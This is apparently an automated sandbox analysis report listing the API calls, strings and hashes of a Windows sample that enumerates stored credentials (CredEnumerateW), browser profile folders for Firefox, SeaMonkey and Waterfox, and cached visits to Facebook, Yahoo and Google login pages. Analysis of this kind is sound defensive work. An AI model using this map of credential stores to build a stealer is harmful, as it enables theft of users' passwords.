                                                                                                                                                          • Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD
                                                                                                                                                        • memset.MSVCRT ref: 0040BF1B
                                                                                                                                                          • Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7
                                                                                                                                                        • free.MSVCRT ref: 0040BFE9
                                                                                                                                                          • Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7
                                                                                                                                                          • Part of subcall function 0040B109: wcslen.MSVCRT ref: 0040B118
                                                                                                                                                          • Part of subcall function 0040B109: _memicmp.MSVCRT ref: 0040B146
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040BFB5
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                        • API String ID: 2804212203-2982631422

Control-flow Graph

APIs
  • Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
  • Part of subcall function 0040D0D4: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
  • Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8
• memset.MSVCRT ref: 00401629
• memset.MSVCRT ref: 00401640
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044F4CC,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040118B,?,?), ref: 0040165C
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040118B,?,?,?,?,000003FF), ref: 0040168A
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040118B), ref: 004016DF
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040118B), ref: 004016F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277

Control-flow Graph

APIs
• memset.MSVCRT ref: 00411FE9
• ??2@YAPAXI@Z.MSVCRT(00002A8C), ref: 0041201F
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 0041205D
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 004120CF
• LoadIconW.USER32(00000000,00000065), ref: 004120D8
• wcscpy.MSVCRT ref: 004120ED
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: =E
• API String ID: 2791114272-2289002813

Control-flow Graph

APIs
  • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7D4
  • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7DC
  • Part of subcall function 0040B02A: free.MSVCRT ref: 0040B031
  • Part of subcall function 0040C722: memset.MSVCRT ref: 0040C746
  • Part of subcall function 0040C722: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
  • Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7D2
  • Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7F2
  • Part of subcall function 0040C722: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
  • Part of subcall function 0040C722: GetLastError.KERNEL32 ref: 0040C821
  • Part of subcall function 0040C871: memset.MSVCRT ref: 0040C8E7
  • Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
  • Part of subcall function 0040C871: _wcsupr.MSVCRT ref: 0040C92F
  • Part of subcall function 0040C871: memset.MSVCRT ref: 0040C97E
  • Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9
• _wcslwr.MSVCRT ref: 0040CCC5
  • Part of subcall function 0040CAE2: wcslen.MSVCRT ref: 0040CB0D
  • Part of subcall function 0040CAE2: memset.MSVCRT ref: 0040CB6D
• wcslen.MSVCRT ref: 0040CCDA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884

Control-flow Graph

[Control-flow graph of function 40ae2a: basic blocks 40ae2a-40aeae calling memset, GetSystemDirectoryW, wcscpy, sub_409cd8, wcscat and LoadLibraryW; executed and not-executed blocks are colour-coded in the original figure]
APIs
• memset.MSVCRT ref: 0040AE4A
• GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
• wcscpy.MSVCRT ref: 0040AE7A
• wcscat.MSVCRT ref: 0040AE90
• LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
• LoadLibraryW.KERNEL32(?), ref: 0040AEAA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: C:\Windows\system32
• API String ID: 669240632-2896066436

Control-flow Graph

[Control-flow graph of function 40b8ec: basic blocks 40b8ec-40baab calling sub_4075c7, sub_407670, CredEnumerateW, sub_406cd0, wcslen, wcsncmp, sub_40b899, sub_407687, memset, memcpy, _wcsnicmp, wcschr and LocalFree; executed and not-executed blocks are colour-coded in the original figure]
APIs
  • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
  • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407610
  • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407623
  • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407637
  • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 0040764B
• CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
• wcslen.MSVCRT ref: 0040B942
• wcsncmp.MSVCRT ref: 0040B974
• memset.MSVCRT ref: 0040B9CD
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040B9EE
• _wcsnicmp.MSVCRT ref: 0040BA38
• wcschr.MSVCRT ref: 0040BA60
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BA84
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 697348961-0
                                                                                                                                                        • Opcode ID: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
                                                                                                                                                        • Instruction ID: fabfe86e697632e3a113e667da81389391c5e61e9c799e2ba2b38c502135d7e8
                                                                                                                                                        • Opcode Fuzzy Hash: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
                                                                                                                                                        • Instruction Fuzzy Hash: 37510AB1E002099FDF20DFA5C8859AEBBF8EF48304F10452AE919F7251E735A945CF69
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413060
                                                                                                                                                        • memset.MSVCRT ref: 00413075
                                                                                                                                                        • memset.MSVCRT ref: 0041308A
                                                                                                                                                        • memset.MSVCRT ref: 0041309F
                                                                                                                                                        • memset.MSVCRT ref: 004130B4
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041317B
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                        • API String ID: 4039892925-11920434
                                                                                                                                                        • Opcode ID: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
                                                                                                                                                        • Instruction ID: 961380efd413e994d860ccb56e6665ca3f7b28eb71c2195a5a659fa08900d420
                                                                                                                                                        • Opcode Fuzzy Hash: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
                                                                                                                                                        • Instruction Fuzzy Hash: C74144B294121CAADB20EB56CC81FCF777CAF85314F1144A7B508F2141EA745B88CF6A
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004131F1
                                                                                                                                                        • memset.MSVCRT ref: 00413206
                                                                                                                                                        • memset.MSVCRT ref: 0041321B
                                                                                                                                                        • memset.MSVCRT ref: 00413230
                                                                                                                                                        • memset.MSVCRT ref: 00413245
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041330C
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                        • API String ID: 4039892925-2068335096
                                                                                                                                                        • Opcode ID: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
                                                                                                                                                        • Instruction ID: 891e70054f67f373fcd1da7e6bb8e88c65c93f586ac1dbd30abc510520fb583d
                                                                                                                                                        • Opcode Fuzzy Hash: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
                                                                                                                                                        • Instruction Fuzzy Hash: AF4142B294121CAADB20EB56CC81FCF777CAF85314F1144ABB509F2142EA745B84CF6A
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413382
                                                                                                                                                        • memset.MSVCRT ref: 00413397
                                                                                                                                                        • memset.MSVCRT ref: 004133AC
                                                                                                                                                        • memset.MSVCRT ref: 004133C1
                                                                                                                                                        • memset.MSVCRT ref: 004133D6
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041349D
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                        • API String ID: 4039892925-3369679110
                                                                                                                                                        • Opcode ID: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
                                                                                                                                                        • Instruction ID: b1b9f3cced5a7470729646768e957e6b9d6e833cd164865aec5624d5e78815e5
                                                                                                                                                        • Opcode Fuzzy Hash: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
                                                                                                                                                        • Instruction Fuzzy Hash: BF4134B294121CAADB20EB56DC81FCF777CAF85314F1144ABB508F2142E6795B84CF6A
APIs
  • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
  • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
• Opcode ID: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
• Instruction ID: 405c2e4babdb8952247d8a080dcda94cd63fb6e5d2decb1bec32cb30ddcbd491
• Opcode Fuzzy Hash: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
• Instruction Fuzzy Hash: 911124B0504744AEF6207F72DD0BE277AA5EF41B14F11483EF0965A8E1DB7AA8608F24
APIs
• CreateFileW.KERNELBASE(?,-7FBE6346,00000003,00000000,?,?,00000000), ref: 0041A3AE
• CreateFileA.KERNEL32(?,-7FBE6346,00000003,00000000,00419C3A,00419C3A,00000000), ref: 0041A3C6
• GetLastError.KERNEL32 ref: 0041A3D5
• free.MSVCRT ref: 0041A3E2
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID:
• API String ID: 77810686-0
• Opcode ID: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
• Instruction ID: c70e6a76c9c0c16949b2d84360e4fde80b94c386b4f0d6e6335da104fa2cc62f
• Opcode Fuzzy Hash: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
• Instruction Fuzzy Hash: DE4135B15093059FE720DF25DC4178BBBE4EF84324F14892EF8A482291D378D9A88B97
APIs
• memset.MSVCRT ref: 00412FAA
• memset.MSVCRT ref: 00412FBF
  • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
  • Part of subcall function 00409CD8: wcslen.MSVCRT ref: 00409CD9
  • Part of subcall function 00409CD8: wcscat.MSVCRT ref: 00409CF1
• wcscat.MSVCRT ref: 00412FE8
  • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
  • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
  • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
• wcscat.MSVCRT ref: 00413011
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
• Instruction ID: 422148556ace2f77c93d77bf435b4c82adbc6076694dfca18b1a60226733ba9e
• Opcode Fuzzy Hash: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
• Instruction Fuzzy Hash: 0801C2B2A4132C65DB207B228C86ECB732C9F45758F0144BBB504E7143D9788DC88AA9
APIs
  • Part of subcall function 00408D81: free.MSVCRT ref: 00408D88
  • Part of subcall function 00413F68: memset.MSVCRT ref: 00413FEF
  • Part of subcall function 00413F68: wcsrchr.MSVCRT ref: 00414007
• memset.MSVCRT ref: 00403D7B
• memcpy.MSVCRT(?,00000000,00001E38), ref: 00403D94
• wcscmp.MSVCRT ref: 00403DC0
• _wcsicmp.MSVCRT ref: 00403DFD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID:
• API String ID: 2758756878-3916222277
• Opcode ID: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
• Instruction ID: 3324fc85694a20c99f30ee3fab2bb6b3f261583d23399c464f958340e94e5838
• Opcode Fuzzy Hash: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
• Instruction Fuzzy Hash: 6D415C716083858ED730DF25C845A8FB7E8EFC6314F504D2FE48893681DB7899498B57
APIs
  • Part of subcall function 00416AE7: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
• memset.MSVCRT ref: 00416BED
• RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
• wcscpy.MSVCRT ref: 00416C62
  • Part of subcall function 0040A2A9: GetVersionExW.KERNEL32(0045E340,0000001A,00416BB5,?,00000000), ref: 0040A2C3
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00416C08, 00416C18
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
